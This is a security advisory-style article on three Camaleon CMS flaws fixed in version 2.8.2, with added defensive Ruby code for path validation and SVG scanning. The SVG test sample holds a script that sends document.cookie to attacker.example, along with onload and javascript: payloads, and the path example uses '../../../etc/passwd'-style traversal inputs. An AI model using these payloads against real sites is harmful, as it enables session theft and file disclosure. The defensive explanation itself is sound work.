Critical Security Flaws in Camaleon CMS Put Web Servers at Risk – Users Urged to Upgrade Immediately
Camaleon CMS, an open-source content management system built on Ruby on Rails, has released version 2.8.2 to fix several vulnerabilities, some of which are reported to be already under active exploitation. Site owners and administrators running an older release should upgrade without delay.
The most severe of the three, tracked as CVE-2024-46986, is an arbitrary file write: an authenticated user can write files to any location on the server that the application process can reach. In a typical deployment that process can also write its own code, templates and configuration, so an arbitrary file write usually escalates to remote code execution and full compromise of the site and its data. The issue carries a CVSS score of 9.9 out of a possible 10.
The second critical issue, CVE-2024-46987, is a path traversal: a request whose file path contains "../" segments (or an absolute path) is resolved outside the directory the application meant to expose, allowing unauthorized reading of sensitive files on the server. Configuration files, credentials and other confidential data stored on the host are the usual targets, further jeopardizing the affected site.
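Both bugs above come down to the same missing check: a user-supplied folder or file name is joined to a base directory and used as-is. The following Ruby is an added illustration for this article, not Camaleon CMS code; the upload root, function names and parameter names are assumptions chosen for the example. It shows the vulnerable join next to a hardened resolver that normalises the path and then requires the result to sit below the root, which is the check a write (CVE-2024-46986) and a read (CVE-2024-46987) path both need:

```ruby
# Added illustration, not Camaleon CMS code. UPLOAD_ROOT and the
# parameter names are assumptions chosen for this example.
UPLOAD_ROOT = File.expand_path('/var/www/app/public/media').freeze

# Vulnerable pattern: the user-controlled folder is joined to the root and
# used as-is. "../" segments (or an absolute folder) walk out of the root,
# and File.join does no normalisation at all.
def unsafe_media_path(folder, filename)
  File.join(UPLOAD_ROOT, folder.to_s, filename.to_s)
end

# Hardened version: normalise first, then require the result to sit below
# UPLOAD_ROOT. Returns the absolute path, or nil when the request must be
# rejected (a controller would answer 400 in that case).
def safe_media_path(folder, filename)
  name = filename.to_s
  dir  = folder.to_s
  # NUL bytes truncate paths in C APIs and make File.expand_path raise.
  return nil if name.include?("\0") || dir.include?("\0")
  # The basename must be one plain component: no separators, not "." or "..".
  return nil if name.empty? || name.match?(%r{[/\\]}) || name == '.' || name == '..'

  # Split the folder into components and drop empty ones, so that a leading
  # "/" cannot turn the join into an absolute path. Backslashes are treated
  # as separators too, which is stricter than Linux needs but harmless.
  parts = dir.split(%r{[/\\]}).reject(&:empty?)
  candidate = File.expand_path(File.join(UPLOAD_ROOT, *parts, name))

  # Prefix check with a trailing separator, so that a sibling directory such
  # as /var/www/app/public/media_old does not pass.
  return nil unless candidate.start_with?(UPLOAD_ROOT + File::SEPARATOR)
  candidate
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs, not captured requests.
  [['2024/09', 'logo.png'], ['../../../etc', 'passwd'], ['docs', '../config.ru']].each do |folder, file|
    puts format('%-22s %-14s unsafe=%s safe=%s', folder, file,
                unsafe_media_path(folder, file), safe_media_path(folder, file).inspect)
  end
end
```

File.expand_path collapses ".." textually and does not follow symlinks; if untrusted users can create symlinks under the upload root, resolve the parent directory with File.realpath before the prefix check. Percent-encoded segments such as %2e%2e are decoded by Rack before the controller sees them, so the check operates on the decoded string, which is the one that matters.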
The third issue is a stored cross-site scripting (XSS) vulnerability in the image upload function. An attacker who can upload a file crafted to carry JavaScript stores that script on the site; raster formats such as PNG or JPEG cannot execute script when displayed, so the usual vehicle is a file such as SVG, which is XML and may contain script elements, event-handler attributes and links. When another user's browser renders the file in the site's origin, the script runs with that user's session and can steal session cookies, perform actions on the user's behalf, or modify the content the user sees.
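Rejecting or sanitising SVG uploads is the usual fix for this class of bug. The following Ruby is an added example for this article, not Camaleon CMS code, and it assumes the uploaded "image" is an SVG document; it parses the upload with the standard-library REXML parser and reports the constructs that turn an image into executable content when a browser renders it inline:

```ruby
require 'rexml/document'

# Added illustration, not Camaleon CMS code. Function and constant names
# are assumptions chosen for this example.
DANGEROUS_ELEMENTS = %w[script foreignobject].freeze

# Returns a list of findings; an empty list means nothing suspicious was seen.
def svg_findings(svg_text)
  findings = []
  doc = REXML::Document.new(svg_text)
  REXML::XPath.each(doc, '//*') do |el|
    tag = el.name.downcase
    # <script> runs directly; <foreignObject> lets arbitrary HTML in.
    findings << "<#{tag}> element" if DANGEROUS_ELEMENTS.include?(tag)
    el.attributes.each_attribute do |attr|
      aname = attr.expanded_name.downcase
      # Event handlers (onload, onclick, onbegin, ...) execute on render.
      findings << "#{aname} attribute on <#{tag}>" if aname.start_with?('on')
      # href / xlink:href pointing at a javascript: URL.
      value = attr.value.to_s.strip.downcase
      if aname.end_with?('href') && value.start_with?('javascript:')
        findings << "#{aname} with javascript: URL on <#{tag}>"
      end
    end
  end
  findings
rescue REXML::ParseException
  # Malformed XML may still be rendered leniently by a browser, so treat it
  # as unsafe rather than letting it through unchecked.
  ['unparseable SVG']
end

def svg_safe?(svg_text)
  svg_findings(svg_text).empty?
end

# Constructed samples for the example, not real uploads.
BENIGN_SVG = <<~SVG
  <svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
    <rect width="10" height="10" fill="blue"/>
  </svg>
SVG

MALICIOUS_SVG = <<~SVG
  <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
       onload="alert(document.cookie)">
    <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
    <a xlink:href="javascript:alert(1)"><text y="10">x</text></a>
  </svg>
SVG

if __FILE__ == $PROGRAM_NAME
  puts "benign:    #{svg_findings(BENIGN_SVG).inspect}"
  puts "malicious: #{svg_findings(MALICIOUS_SVG).inspect}"
end
```

A scanner like this is a pre-filter, not a complete defence: the safer options are to refuse SVG from untrusted uploaders altogether, to rasterise it server-side, or to serve user files from a separate origin with Content-Disposition: attachment and a restrictive Content-Security-Policy so that even a file with script in it never executes in the site's origin.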
The Camaleon CMS maintainers have published fixes for all three issues in version 2.8.2; the responsibility now lies with site owners and administrators to deploy it. Check the camaleon_cms version pinned in your application's Gemfile.lock, upgrade to 2.8.2 or later, and redeploy. Until that is done, a site remains exposed to anything from disclosure of server files to complete compromise.